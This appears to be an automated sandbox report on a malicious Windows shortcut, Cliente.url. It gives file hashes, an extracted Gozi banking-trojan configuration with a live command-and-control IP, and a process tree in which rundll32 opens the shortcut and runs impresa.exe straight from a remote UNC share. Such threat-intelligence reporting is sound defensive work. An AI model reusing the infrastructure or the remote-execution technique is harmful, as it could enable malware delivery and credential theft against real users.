Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 12:41
Static task
static1
Behavioral task
behavioral1
Sample
Cliente.url
Resource
win7-20230831-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Cliente.url
-
Size
193B
-
MD5
9c1dcd25ee65745e3f0fc5ee187277ab
-
SHA1
819fe69f437a44eb02b4d4adfad50b1d6d685cbf
-
SHA256
af0de9d1c38ade4fcdca65f63931ce325a0c0c1ab16518bed11cc3ae6fecd0b9
-
SHA512
f155feeab684a22cf526eaf3e4c93a75a0bf0dc681083f1f792a228f5527290ebedc20b764a49595bc660c8b0c079e82484f0032a9d99281478184fc7d8ec1e6
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
5050
C2
45.93.139.24
Attributes
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 3332 wrote to memory of 2352 3332 rundll32.exe impresa.exe PID 3332 wrote to memory of 2352 3332 rundll32.exe impresa.exe PID 3332 wrote to memory of 2352 3332 rundll32.exe impresa.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3332 -
\??\UNC\62.173.146.71\scarica\impresa.exe"\\62.173.146.71\scarica\impresa.exe"2⤵PID:2352
-